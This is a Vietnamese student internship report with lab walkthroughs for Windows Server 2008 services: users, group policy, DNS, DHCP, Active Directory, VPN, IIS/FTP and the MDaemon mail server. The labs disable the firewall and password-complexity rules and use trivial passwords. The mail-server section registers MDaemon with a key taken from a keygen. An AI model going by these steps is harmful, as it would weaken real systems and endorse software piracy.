Báo Cáo Cuối Khóa

Trung Tâm Đào Tạo Quản Trị Mạng Và An Ninh Mạng Quốc Tế Athena

BÁO CÁO THỰC TẬP CUỐI KHÓA

Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008

GVHD: Võ Đỗ Thắng

Sinh viên thục hiện:

- Lý Ngọc Diệp- Phạm Thị Diễm Kiều- Nguyễn Thị Tuyết

TP. Hồ Chí Minh, ngày 5 tháng 5 năm 2014


LỜI MỞ ĐẦUNgày nay với sự phát triển của khoa học kỹ thuật thì máy tính trở

nên phổ biến với mọi người. Chúng mang lại cho con người khả năng to lớn và làm những công việc phi thường: tính toán nhanh và chính xác các bài toán phức tạp, điều khiển tự động, giải trí… Máy tính ra đời không chỉ hỗ trợ trong sản xuất mà còn trong việc học tập và làm góp phần giải phóng sức lao động. Máy tính điện tử là một phát minh, thành tựu to lớn cho sự phát triển của nhân loại góp phần thúc đẩy mạnh mẽ tiến bộ khoa học và kỹ thuật nói riêng cũng như nhân loại nói chung.

Bên cạnh sự phát triển chóng mặt của máy tính trong thời buổi công nghệ thông tin thì các ứng dụng, dịch vụ mạng là nền tản không thể tách rời. Sức mạnh máy tính có thể nhân lên gấp nhiều lần khi được kết nối thành mạng máy tính. Là cơ sở hạ tần cho phép trao đổi thông tin, truyền tải dữ liệu từ xa nhằm rút ngắn khoảng cách. Với mạng máy tính toàn cầu chúng ta dễ dàng tiếp cận với sự phát triển của thế giới trong đó có sự phát triển gần nhất của Windows Server là Windows Server 2000 và Windows Server 2003 và tiếp đến là Windows Server 2008 hỗ trợ tốt các dịch vụ mạng cần thiết trên Server, việc cải tiến không ngừng giúp nâng cao tính ổn định và an toàn hơn cho Windows Server 2008 hoạt động một cách trơn tru.

Hiện nay quá trình công nghiệp hóa hiện đại hóa đất nước là một chủ trương hàng đầu của nhà nước. Mạng máy tính trở thành mục tiêu nghiên cứu và phát triển. Cốt lõi là ngành công nghệ thông tin bao gồm nhiều lĩnh vực từ kiến trúc mạng đến nguyên lý thiết kế, cài đặt mô hình ứng dụng v.v… Mạng viễn thông nói chung và mạng máy tính trên nền tảng Windows Server 2008 nói riêng là công cụ hũu dụng không thể thiếu trong bộ máy nhà nước, trường học, doanh nghiệp… Nó đóng vai trò cầu nối trao đổi thông tin giữa các chính phủ, tổ chức xã hội và mọi người với nhau.

Qua thời gian học tập và nghiên cứu trên ghế nhà trường cùng với sự hỗ trợ tận tình của Thầy cô, bạn bè và người thân đã giúp em thu thập được nhiều kiến thức quý báo. Đặc biệt là quá trình thực tập tại Trung tâm ATHENA giúp em có những trải nghiệm vô cùng thú vị và bổ ích. Với mong muốn tìm hiểu về mạng máy tính và góp phần xây dựng một mạng máy tính thân thiện, thông minh cho mọi người sử dụng.

Tuy đã có nhiều cố gắng song không thể tránh những khuyết điểm, sai sót vì thế mong được sự thông cảm và những ý kiến đóng góp quý báo từ Quý Thầy Cô, bạn bè, bạn đọc, để em có thể ngày một hoàn thiện đề tài của mình hơn. Xin chân thành cảm ơn.


LỜI CẢM ƠN

Thực tập là quá trình tham gia học hỏi, so sánh, nghiên cứu và ứng dụng những kiến thức đã học vào thực tế công việc ở các cơ quan quản lý hành chính nhà nước và các công việc sau này. Với nhiều kiến thức còn bỡ ngỡ của một sinh viên năm cuối ,chuyên ngành công nghệ thông tin trường Đại học Tài Nguyên Và Môi Trường TPHCM ,tôi đã được tham gia trong suốt quá trình thực tập tại trung tâm Athena. Tại đây chúng tôi đã nhận được nhiều sự hỗ trợ và giúp đỡ của các bạn bè đồng nghiệp và đặc biệt là sự tận tình, chu đáo của thầy Võ Đỗ Thắng, giám đốc Trung tâm đào tạo và quản trị mạng an ninh quốc tế. Cùng với sự hỗ trợ từ phía nhà trường, xin gởi lời cảm ơn chân thành đến quý thầy cô khoa công nghệ thông tin trường Đại học Tài Nguyên Và Môi Trường TPHCM đã tạo điều kiện tốt nhất để chúng tôi hoàn thành khóa thực tập này.

Với sự nỗ lực của bản thân và sự hỗ trợ giúp đỡ, kiến thức ban đầu vẫn còn nhiều hạn chế, vì vậy không tránh khỏi những thiếu sót trong quá trình hoàn thành báo cáo. Mong nhận được nhiều đóng góp ý kiến của quý thầy cô cũng như nhiều bạn cùng chuyên môn để có thể nắm vững kiến thức hơn.

Sau cùng, chúng tôi xin kính chúc quý Thầy Cô trong Khoa Công Nghệ Thông Tin và Thầy Võ Đỗ Thắng lời chúc sức khỏe, niềm tin để tiếp tục thực hiện sứ mệnh cao đẹp của mình_ truyền đạt kiến thức cho thế hệ mai sau.

Trân trọng.


NHẬN XÉT CỦA GV...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................


Mục LụcCHƯƠNG 1: TỔNG QUAN............................................................................................3

1.1 Giới thiệu về cơ quan thực tập...............................................................................3

1.1.1 Trụ sở và các chi nhánh Trụ sở chính.............................................................1

1.1.2 Cơ cấu tổ chức................................................................................................1

1.1.3 Cơ sở vật chất.................................................................................................2

1.1.4 Vấn đề cần giải quyết.....................................................................................3

CHƯƠNG 2: KIẾN THỨC CƠ SỞ..................................................................................3

2.1 Lý thuyết.................................................................................................................3

CHƯƠNG 3: PHƯƠNG PHÁP THỰC HIỆN VÀ KẾT QUẢ........................................4

3.1 Phương pháp nghiên cứu........................................................................................4

CHƯƠNG 4: CHI TIẾT KẾT QUẢ.................................................................................4

4.1 LOCAL USER AND GROUP................................................................................4

4.2 Local Policy.........................................................................................................11

4.3 Local Security policy...........................................................................................22

4.4 DNS......................................................................................................................34

4.5 DHCP...................................................................................................................40

4.6 Domain.................................................................................................................46

4.7 VPN.......................................................................................................................55

4.8 IIS.........................................................................................................................70

4.9 Mail Server...........................................................................................................79

4.10 Khai thác mã lỗi MS10_042..............................................................................93

4.11 Mail Server trên VPS.......................................................................................100

4.12 WINDOWS SERVER BACKUP....................................................................117


CHƯƠNG 1: TỔNG QUAN1.1 Giới thiệu về cơ quan thực tập

Giới thiệu công tyTrung tâm Đào Tạo Quản Trị Mạng và An ninh Mạng Quốc Tế

ATHENA_ Tiền thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy phép kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04

tháng 11 năm 2008.

Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRANINGNETWORK SECURITY COMPANY LIMITED ATHENA.

Là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lĩnh vực công nghệ thong tin. Với quyết tâm góp phần vào công cuộc đẩy tiến trình tin học hóa của nước nhà ATHENA đã và đang tập trung chủ yếu vào các hoạt động sau:


Công tác huấn luyện , quảng bá kiến thức tin học, đặc biệt trong lĩnh vực mạng máy tính, internet, bảo mật và thương mại điện tử…

Tư vấn và hỗ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản xuất kinh doanh.

Cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên gia về mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho các tổ chức, doanh nghiệp có nhu cầu.

Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ sở dữ liệu thong tin về các ứng dụng và sự cố mạng.

Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy ra sự cố máy tính.1.1.1 Trụ sở và các chi nhánh Trụ sở chính

Trụ sở chính _Trung Tâm Đào Tạo Quản Trị Mạng Và An Ninh Mạng Quốc Tế ATHENA .

Số 2 Bis Đinh Tiên Hoàng , phường Đa Kao, Tp Hồ Chí Minh , Việt Nam.

Website :www.athena.com.vnĐiện thoại: (84-8) 38244041Hotline : 0943 23 00 99Cơ sở 2_Trung Tâm Đào Tạo Quản Trị Mạng Và An Ninh Mạng

Quốc Tế ATHENA92 Nguyễn Đình Chiểu, phường Đa Kao, Quận 1, Tp Hồ Chí Minh,

Việt Nam.Website :www.Athena.Edu.VnĐiện thoại: (84-8) 2210 3801Hotline : 0943 111 692 Chi nhánh Nha Trang+ Điện thoại: 08 3824 4041 + Fax: 08 39 111 692+Website: www.athena.edu.vn+Email: [email protected]

1.1.2 Cơ cấu tổ chứcSơ đồ cơ cấu tổ chứcHình 1.Sơ đồ tổ chức công ty

Cơ cấu tổ chứcSơ đồ cơ cấu tổ chứcHình 1.Sơ đồ tổ chức công ty

mailto:[email protected]

http://www.athena.edu.vn/

http://www.Athena.Edu.Vn/

http://www.athena.com.vn/


Sau gần 10 năm hoạt động , nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin – Bộ Quốc Phòng, Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…

Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ CHính Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự ,......1.1.3 Cơ sở vật chất Thiết bị đày đủ và hiện đạiChương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công nghệ mới nhất.Phòng máy rộng rãi, thoáng mát.Giới thiệu về nội dung công việc được giao thực tậpNội dung cần giải quyết

- Cài đặt windows server 2008- Nâng cấp Stand Alone thành Domain controller- Cài đặt windows xp- Join Domain cho windows xp


- Cài đặt và cấu hình DNS và DHCP- Tạo user account trên AD, thiết lập Policy cho phép user có quyền thay

đổi giờ hệ thống.- Dựng hệ thống Multi Master cho Domain controller- Backup cho Domain controller- Tìm lỗ hổng của hệ thống

1.1.4 Vấn đề cần giải quyếtVấn đề đặt ra vẫn cón nhiều khó khăn.Chủ đề đã được nhiều người

thực hiện rất tốt.Chính vì thế, cũng đã gây nhiều áp lực khi thực hiện chủ đề này.

Yêu cầu đặt ra phải được thực hiện rõ ràng, các máy ảo phải được thực hiện đầy đủ. Các bước thực hiện phải được ghi lại một cách chi tiết.

Phạm vi của đề tàiVấn đề đặt ra vẫn còn nhiều khó khăn.Chủ đề đã nhiều người thực

hiện rất tốt. Chính vì thế đã gây nhiều áp lực khi thực hiện,đòi hỏi nhiều chuyên sâu hơn

Yêu cầu đặt ra phải được thực hiện rõ rang,các máy ảo phải được thực hiện đầy đủ. Các bước thực hiện phải được ghi lại một cách chi tiết

Các bước đã làm được+ Cài đặt windows server 2008+ Nâng cấp Stand Alone thành Domain controller+ Cài đặt windows xp+ Join Domain cho windows xp+ Cài đặt và cấu hình DNS và DHCP+ Tạo user account trên AD, thiết lập Policy

CHƯƠNG 2: KIẾN THỨC CƠ SỞ2.1 Lý thuyết

Hoạt động mạng máy tính, vận hành hệ thống mạng, giải quyết sự cố mạng và nắm được các phương pháp để bảo vệ mạng trước trước nguy cơ virus, worm, trojan, spam. Cũng như các biện pháp chống xâm nhập, ăn cắp thông tin, phá hoại mạng.

Công việc cần thực hiện chính là nắm được các bước và cách làm để thực hiện quản trị cách tốt nhất.Biết cách cài đặt máy chủ và client, tìm hiểu nhiều tài liệu để biết quản trị các hoạt Nắm vững các bước thực hiện trong quản trị Windows server 2003.

Có khả năng tự thiết lập một mạng máy tính, cấu hình mạng, điều chỉnh năng hoạt động của mạng.

Kỹ thuậtHoạch định và chuẩn bị đầy đủ là yếu tố quan trọng quyết định quá

trình cài đặt có thuận lợi hay không.Trước khi cài đặt, bạn phải biết


được những gì cần có để có thể cài đặt thành công và bạn có được tất cả thông tin cần thiết để cung cấp cho quá trình cài đặt. Để lên kế hoạch cho việc nâng cấp hoặc cài đặt mới các Server nên tham khảo các hướng dẫn từ Microsoft Windows Server 2008. Các thông tin biết trước khi nâng cấp hoặc cài mới hệ điều hành:

Phần cứng đáp ứng được yêu cầu của Windows Server 2008.Làm sao để biết được phần cứng của hệ thống có được Windows

Server 2008 có hỗ trợ hay khôngĐiểm khác biệt giữa cài đặt mới và nâng cấp (upgrade).Những lựa chọn cài đặt nào thích hợp với hệ thống của bạn, chẳng

hạn chiến lược chia partition đĩa, và bạn sẽ sử dụng hệ thống tập tin nào…

Còn nhiều yêu cầu kĩ thuật sẽ nói trong chương 4CHƯƠNG 3: PHƯƠNG PHÁP THỰC HIỆN VÀ KẾT QUẢ3.1 Phương pháp nghiên cứu- Phương pháp nghiên cứu chính là tìm hiểu các tài liệu, làm theo yêu cầu của đơn vị thực tập, được hướng dẫn chi tiết cách thức thực hiện.-Xác định rõ ràng công việc cần thực hiện- Sắp xếp lịch để thực hiện-Cần chuẩn bị những gì để đáp ứng yêu cầu mà đề tài nghiên cứu đã đặt ra.-Cài đặt máy thích hợp để thực hiện -Chuẩn bị phần cứng , ổ đĩa để đáp ứng cho việc nghiên cứu-Mô tả chi tiết-Kết quả chính là các demo chạy chương trình và các bước thực hành, được quay lại bằng video, sẽ được trình bày cụ thể tại chương 4.CHƯƠNG 4: CHI TIẾT KẾT QUẢ4.1 LOCAL USER AND GROUPChuẩn bị: - Máy Window Sever 2008(chưa năng cấp Domain ) Sever 1NIC:192.168.1.1/24-Máy Window XP:PC1NIC 1:192.168.1.2/24


Mô hình

Mục Tiêu bài LAB:

- Tạo local user and group trên máy sever 1

- Mục tiêu cuối cùng:các user có thể đăng nhập vào máy sever 1

LƯU Ý:-Khi thực hiện trên máy ảo VM-WARE các car mạng sẽ được thiết lập ở chế độ HOST ONLY-Nên tắt tính năng window Firewall trên các máy sever và PCThực hiện:

- Bước 1( Tạo local user)

Trên máy sever,vào start chọn run rồi gõ lusrmgr.msc để vào local use and groups:

Trong Local uer and groups,chuột phải vào User chọn New tạo 2 User U1 và U2 với pass là 123abc!!!


Tương tự đối với u2

- Bước 2( Đăng nhập User vừa tạo trên Sever 1)

Đăng nhập vào Sever 1 bằng U 1:


Trong U1,có thể truy cập vào Profile chủa chính mình nhưng không thể truy cập vào Profile của User khác


- Bước 3( Tạo Local Group và add User vào Group đó)

Trên máy Sever 1,vào start chọn run rồi gõ lusrmgr.msc để vào Local Group and User Group

Trong Local Group and User Group,chuột phải vào Group chọn New Group tạo 2 Group ketoan,nhansu rồi chọn Add để thêm U1 vào Group ketoan và U2 vaog Group nhansu



- Bước 4 Cấu hình cho phép User u1 tự động đăng nhập vào Sever 1 khi khởi động:

Trên máy Sever1,vào Start chọn run gồi gõ UserPassword2 để vào Users Accounts

Trong Users Accounts,bỏ check ở phần Users must enter a user name pasword to use this computer rồi chọn Apply


Sau đó nhập tên User và password muốn đăng nhập tự động vào sever1:

Chọn ok ok , sau đó Retstart máy để kiểm tra kết quả 4.2 Local PolicyChuẩn bị:

- Máy Window Sever 2008(chưa năng cấp Domain ) Sever 1NIC:192.168.1.1/24-Máy Window XP:PC1NIC 1:192.168.1.2/24

Mô hình:

Mục tiêu bài LAB: Tạo local policy trên máy Sever1 để áp dụng lên từng đối tượng

khác nhauMục tiêu cuối cùng:áp dụng các chính sách cho các đối tượng khác

nhau


Lưu ý:Khi thực hiện trên máy ảo VM-WARE các car mạng sẽ được thiết lập ở chế độ HOST ONLYNên tắt tính năng window Firewall trên các máy sever và PC

- Bước 1: Tạo Group Policy Console cho u2, Administrator, Non -AdministratorTrên máy Sever1,vào Strart chọn run rồi gõ ccm để vào Console1[Console Root]

Trong Console1[Console Root],chọ File-> Add/Remove Snap-ins


Trong Add/Remove Snap-ins,chọn Group Policy Object rồi chọ Add

Trong Select Group Policy Object,chọn Browes.


Trong Browes for a Group Policy Object rồi chọn sang tab Users để chọn U2:

Thực hiện tương tự đẻ cho group Administrator và Non- Administrator


Sauk hi tạo xong U2, Administrator và Non- Administrator,ta sẽ vào file rồi chon Save để lưu lại Console này

- Bước 2: Tạo Group Policy để tắt Shutdow Event Trackker trên Sever1 cho Administrators

Chọn Start-> Run rồi gõ gpedit.msc để vào Local Group Policy Editor

Trong Local Group Policy Editor,chọn Computer Comfiguration->Administrative Templates-> System chọn Dislay Shutdow Event


Tracker

Trong Dislay Shutdow Event Tracker Properties,check vào Disabled:


Để update Group policy vừa cấu hình,ta vào Start->run gõ cmd. Sau đó gõ lệnh gpupdate/force:

Test thành công Group Policy vừa tạo:

- Bước 3: Tạo Group Policy không cho Group Non-Administrators truy cập Control Panel


Trên máy Sver,mở lại Group Policy Cosole đã tạo khi nãy rồi chọn Non-Administrators Policy

Trong Non-Administrators policy,chọn Use Configuration->Administrative Templates->Control Panel chọn Prohibit access to the

Contro Panel:


Trong Prohibit access to the Control Panel Properties,chọn Enabled:

Để update group policy vừa cấu hình,ta vào Start->Run gõ cmd.Sau đó gõ lệnh gpupdate/force:


Test Group Policy vừa tạo bằng cách đăng nhập vào u1 và u3 để kiểm tra sẽ không thấy Control Panel:

- Bước 4( Cấu hình group policy không hiển thị Recycle Bin khi User u2 đăng nhập Sever1)

Trên máy Sever1,mở lại Group Policy Console đã tạo khi nảy rồi chọn U2 policy


Trong U2 Policy,chọn User Configuration->Administrative Templates->Desktop rồi chọn Remove Recycle Bin icon from desktop:

Trong Remove Recyde Bin icon from desktop properties chọn Enabled:


Để update group policy vừa cấu hình, ta vào start->run gõ cmd. Sau đó gõ lệnh gpupdate/force:

Test Group policy vừa tạo bằng cách đăng nhập vào U2 để kiểm tra sẽ không thấy icon Recycle Bin


4.3 Local Security policyChuẩn bị:

- Máy Window Sever 2008(chưa năng cấp Domain ) Sever 1

NIC:192.168.1.1/24

- Máy Window XP:PC1

NIC 1:192.168.1.2/24Mô hình:

Mục Tiêu bài LAB:

- Tạo local Security Policy trên máy Sever1 để áp dụng chính sách cho các User

- Mục tiêu cuối cùng: Áp dụng được các chính sách an ninh cho các user

Lưu ý

- Khi thực hiện trên máy ảo VM-WARE các car mạng sẽ được thiết lập ở chế độ HOST ONLY

- Nên tắt tính năng window Firewall trên các máy sever và PC

Thực hiện- Bước 1: Cho Phép tạo User với password đơn giảnTrên máy Sever1,vào Start chon Run rồi gõ lusrmgr.msc để vào Local Users and Groups:


Trong Local User And Group, tạo mới User U1,với password đơn giản là 123 sẽ báo lỗi là pasword không đủ độ phức tạp


Trên máy Sever 1, vào Start chọn Run rồi gõ secpol.msc để vào Local Security Policy

Trong Local Security Policy,chọn Account -> Passwword Policy->Password must meet complexity requirements:


Trong Password must meet complexity requirements,chọn Disable,sau đó Apply rồi ok

Để update security policy vừa cấu hình, ta vào Start->Run gõ gpupdate /force rồi Enter.


Test Security policy vừa tạo bằng cách tạo lại User lest1 với passwords đơn giản là 123

- Bước 2: Tạo 1 Security Policy khóa 1 User nếu đăng nhập vào sever1 sai 3 lần


Trong Local Security Policy, chọn Account Policies-> Account Lockout Policy,tiếp theo ta sẽ cấu hình 3 mục là:Account lockout duration,Account lockout threshold và Reset account lockout counter after

Trong Account lockout duration Properties( quy định thời gian khóa user đăng nhập sai 3 lân),gõ số phút mà bạn muốn xóa user vào phần Account is locked out for:

Trong Reset account lockout counter after ( quy định thời gian reset user đã bị khóa vào phần Reset account lock out counter after)


Trong Reset account lockout counter after ( quy định thời gian reset user đã bị khóa do đăng nhập sai 3 lần),gõ số phút mà bạn muốn reset user bị khóa vào phần Reset account lock out counter after:

Để update security policy vừa cấu hình, ta vào Start->Run gõ gpupdate/force rồi Enter


Test security vừa tạo bằng cách đăng nhập 1 User sai quá 3 lần và

đây là thông báo lỗi của User lest1

Trong Local User and Group của Administrator,ta sẽ thấy lest1 bị khóa như sau


- Bước 3:( Tạo Security Policy cho phép tất cả các User đều có quyền tắt máy)

Đầu tiên ta đăng nhập user1 sẽ không thấy quyền tắt máy


Trên máy sever1 vào Start chọn Run rồi gõ secpol.msc để vào local Security Policy

Trong Local Security Policy, chọn Local Policies->User Rights Assignment->Shutdown the systen


Trong Shutdown the system Properties, chọn Add User or Group và ở ô Enter the object names to select ta gõ Everyone rồi OK-> OK

Để update security policy vừa cấu hình, ta vào Start->Run gõ gpupdate /force rồi Enter.


Test security policy vừa tạo bằng cách đăng nhập vào 1 user bất kì để kiểm tra quyền tắt máy:


4.4 DNS Dịch vụ này giúp các bạn tạo nhiều Trang web chạy cùng một cổng (80). Đồng thời cung cấp khả năng truy cập các trang Web bằng tên miền thay cho IP.

- Bước 1: Cài đặt dịch vụ DNS

Start menu > Administrative tools > Server Manager


Chọn DNS Server > Next > Next > Install

- Bước 2: Cấu hình DSN Zones và kiểm tra

Start menu > Administrative Tools > DSN

R-Click Forward Lookup Zone > New Zone…


Click Next

Chọn Primary zone > Next

Click Next


Click Next

Click Next


Click Finish

- Bước 3: Cấu hình Zone


R-Click Zone: athena.edu.vn > New Host (A or AAAA)…

Name: Để trống IP address: 192.168.1.1 (IP của máy đang chạy IIS) Ta sẽ kiểm tra bằng cách trên máy sever1 vào Start chọn run gõ cmd


Trên máy Xp ta cũng kiểm tra tương tự

4.5 DHCPChuẩn bị: - Máy Windows Server 2008: Server 1 NIC 1: 192.168.1.1/24 - Máy Windows XP: PC 1 NIC 1: IP nhận động Mô hình:


Mục tiêu: - Xây dựng máy chủ dịch vụ cấp phát địa chỉ IP động cho các máy

trong mạng LAN. Lưu ý:

- Nếu thực hiện trên VW-Ware thì phải tắt tính năng DHCP trong mục Virtual Network Editor. - Trong cùng một hệ thống, chỉ sử dụng một DHCP - Server để cấp phát IP.

Thực hiện:

- Bước 1: Cài đặt dịch vụ DHCP trong Server Roles.

Start Menu > Adminsitrative tools > Server Manager

Click Add Roles.


Click chọn DHCP Server > Next


Chọn chính xác card mạng mà ta muốn cấp phát IP thông qua nó! > Next

Thông tin Domain, Primary DNS, Altenate DNS. Ví dụ: Domain Athena.edu.vn, DNS: 192.168.1.1 > Next


DHCP Scopes > Click Add Scope

Điền thông tin Scope. > OK > Next


IP version 6: Disable > Next > Install > CloseBước 2: Kiểm tra IP được cấp trên máy Windows XP

IP đã nhận chính xác từ DHCP - Server


4.6 DomainChuẩn bị: - Máy Windows Server 2008 (chưa nâng cấp Domain) NIC 1: 192.168.1.1/24 - Máy Windows XP: PC 1 NIC 1: 192.168.1.2/24

Mục tiêu bài LAB: - Cài Domain Controller trên máy server1 và tiến hành join PC1 vào

domain và đăng nhập Domain Administrator để sử dụng Administrative Tools cho máy

PC1. - Mục tiêu cuối cùng: cài đặt Domain Controller và join PC1 vào

domain thành công. Lưu ý:

- Khi thực hiện trên máy ảo VM-ware, các card mạng sẽ thiết lập ở chế độ HOST ONLY,

- Nên tắt tính năng Windows Firewall trên các máy Server và PC.

Thực Hiện:

- Bước 1: cài đặt Domain Controller trên máy server1:

Trên máy server1, cấu hình Preferred DNS server trên card mạng trỏ về máy server1(192.168.1.1):


Vào Start -> Run gõ dcpromo để nâng cấp Domain Controller cho máy server1:


Trong cửa sổ Welcome to the Active Directory Domain Services Installation Wizard, ta để mặc định rồi chọn Next:

Trong cửa sổ Operating System Compatibility, ta để mặc định rồi chọn Next:


Trong cửa sổ Choose a Deloyment Configuration, ta chọn Create a new domain in a new forest rồi chọn Next:


Trong cửa sổ Name the Forest Root Domain, trong phần FQDN of the forest root domain, ta gõ tên domain muốn đặt cho domain mới rồi chọn Next:


Trong cửa sổ Set Forest Functional Level, tùy theo hệ thống của bạn đang sử dụng thế hệ

windows server nào mà ta chọn cho phù hợp ở phần Forest functional level rồi chọn Next:


Trong cửa sổ Additional Domain Controller Options, ta chọn Next. Sau đó trong phần Active Directory Domain Services Installation Wizard, ta chọn Yes:

Trong cửa sổ Location for Database, log Files, and SYSVOL, ta chọn Next để tiếp tục quá trình cài đặt:


Trong cửa sổ Directory Services Restore Mode Administrator Password, ta gõ password muốn sử dụng để quản trị domain này vào ô Password & Confirm password rồi chọn Next:

Trong cửa sổ Summary, ta chọn Next:


Sau đó, ta check vào tùy chọn Reboot on completion để hệ thống tự động restart sau khi hoàn thành quá trình nâng cấp Domain Controller


4.7 VPNVPN - Client to SiteChuẩn bị: - Máy Windows Server 2008: Server 1 NIC 1: 192.168.1.1/24 (NAT) NIC 2: 10.0.0.1/8 (Host Only) - Máy Windows XP: PC 1 NIC 1: 192.168.1.2/24 (NAT) - Máy Windows XP: PC 2 NIC 1: 10.0.0.2/8 (Host only) Mô hình:

Mục tiêu bài LAB: - Cài đặt Routing and Remote Access (LAN routing, VPN) - Cấu hình VPN cho phép PC 1 có thể truy cập vào máy PC 2. - Kiểm tra dịch vụ bằng thư mục chia sẻ trên PC 1. Thực hiện: Bước 1: Cài đặt Routing and Remote Access Trên máy Server 1, Server 2 tiến hành cài đặt dịch vụ Routing And

Remote Access. Vào Start Menu > Administrative Tools > Server Manager bấm vào

add Roles


Chọn Next


Click chọn Network Policy and Access Services. > Next > Next


Click chọn Routing and Remote Access Services. > Next > Install. Click Close sau khi cài xong.

Bước 2: Cấu hình Routing and Remote Access. Thực hiện trên Server 1 Vào

Start Menu > Administrative Tools > Routing and Remote Access.

Click phải chuột vào Server > Configure and Enable Routing

Remote Access


c

Click Next


Chọn dòng Custom configuration > Next

Chọn hai mục: VPN Access và LAN routing > Next > Finish > Start Service


R- Click Server > Propertices

Click chọn: Static address pool > Click Add


Điền range IP: Start IP address: 192.168.1.50 End IP address: 192.168.1.100 > OK > OK Bước 3: Tạo tài khoản trên Server và cấp quyền truy cập VPN Start menu > Administrative tools > Server Manager


Trong nhánh Configuration > Local Users and Group R-Click vào Users > New User

Điền thông tin user > Create > Close


R-Click vào User vpn > Propertices

Trong thẻ Dial- in Click chọn: Allow access > OK Bước 4: Tạo kết nối VPN trên máy PC 2: Trên máy PC 2


Start menu > Settings > Control Panel > Network and internet connection

Chọn mục: Create a connection to the network at your workplace

Chọn mục: Virtual Private Network connection > Next


Điền thông tin công ty: Athena > Next

Điền IP của Server: 10.0.0.1 (Đây là IP NIC 2 của Server 1) > Next


Chọn Add a shorcut to connection to my desktop > Finish

R-Click vào "Athena" chọn Connect


Điền thông tin user name và password > Connect

Trên máy PC 2 tiến hành ping kiểm tra kết nối đến máy PC 1


Tín hiệu phản hồi từ PC 2 là rất tốt. Bước 5: Share thư mục trên PC 1 và tiến hành truy cập từ PC 2

Share thành công.

Kết thúc phần LAB VPN - Client to Site


4.8 IIS Chuẩn bị: - Máy Windows Server 2008: Server 1 - Máy Windows XP: PC 1 Mô hình LAB

Mục tiêu bài LAB: Cài đặt dịch vụ IIS trên Windows Server 2008 Ứng dụng dịch vụ IIS để triển khai Web Server và FTP Server Thực hiện: Bước 1: Cài đặt IIS Start menu > Administrative tools > Server Manager


Click Add Roles

Click chọn: Web Server (IIS)


Chọn Add Required Features Click NEXT > NEXT

Click chọn FTP Publishing Service

Click Add Required Services Click Next > InstallBước 2: Tạo một trang Web và kiểm tra


Tạo thư mục chứa trang Web đường dẫn: C:\athena\ Trong thư mục "C:\athena\" tạo một File tên: "index.htm"

Edit file này với Notepad và thêm nội dung là: Welcome to Athena.edu.vn >Save fileĐăng ký trang web này với IIS để truy cập bằng dịch vụ web. Start menu > Administrative > IIS

R-Click vào Sites > Add Web Site…


Site name: athena Physical path: C:\athena > OKLưu ý: Khi thực hiện tạo web site mới trên cùng một cổng 80 thì sẽ

bị trùng với trang Default Web Site, cho nên ta phải Stop trang Default hoặc xóa nó đi. Kiểm tra: Mở trình duyệt Web gỏ vào địa chỉ: 192.168.1.1 để xem kết quả

. Bước 3: Tạo một FTP Site và kiểm tra Start menu > Administrative tools > IIS


Chọn FTP Sites > Click here to lauch

R-Click FTP Site > New > FTP Site


Click NEXT >

Đặt tên cho FTP Site > Next


Click Next

Chọn Do not isolate users > Next


Chọn đường dẫn thư mục Home của FTP site > Next

READ : Chỉ đọc WRITE: Cho phép ghi dữ liệu > Next > Finish


Lưu ý quan trọng: FTP site mới nếu sử dụng cổng mặc định là 21 thì sẽ bị trùng với

các FTP Site khác cũng chung cổng 21. Trong cùng một thời điểm chỉ có một FTP site được

chạy trên cùng một cổng. Kiểm tra: Trên Windows XP - PC 1 Mở trình windows explorer: gỏ vào ô địa chỉ đường dẫn sau để truy

cập FTP Site: ftp://192.168.1.1 Tạo một thư mục trên FTP Site

4.9 Mail ServerMail Server chứa mailbox của người dùng. Mail Server nhận mail

từ mail Client gửi đến và đưa vào Mail Server nhận mail từ Mail Host

gửi đến và đưa vào mailbox của người dùng. Người dùng sử dụng NFS

(Network File System) để mount thư mục chứa mailbox trên Mail

Serverđể đọc. Nếu NFS không được hỗ trợ thì người dùng phải login


vào Mail Server để nhận thư.Trong trường hợp Mail Client hỗ trợ

POP/IMAP và trên Mail Server cũng hỗ trợ POP/IMAP thì người dùng

có thể đọc thư bằng POP/IMAP.

Cài đặt Mail Mdeamon

-> Next

Để mặc định rồi Next


Tiếp theo ta chọn mục keygen, ta coppy cái key vào Installation Type,sau đó chọn I already have a registrtion key(enter it here)

Điền thông tin ở phần Registration Information


Gõ tên Domain: Athena.edu.vn


Điền thông tin

Điền thông tin địa chỉ IP


Trên máy Sever vào Start Mdaemon

Tiếp tục để mặc định rồi Next -> Finish


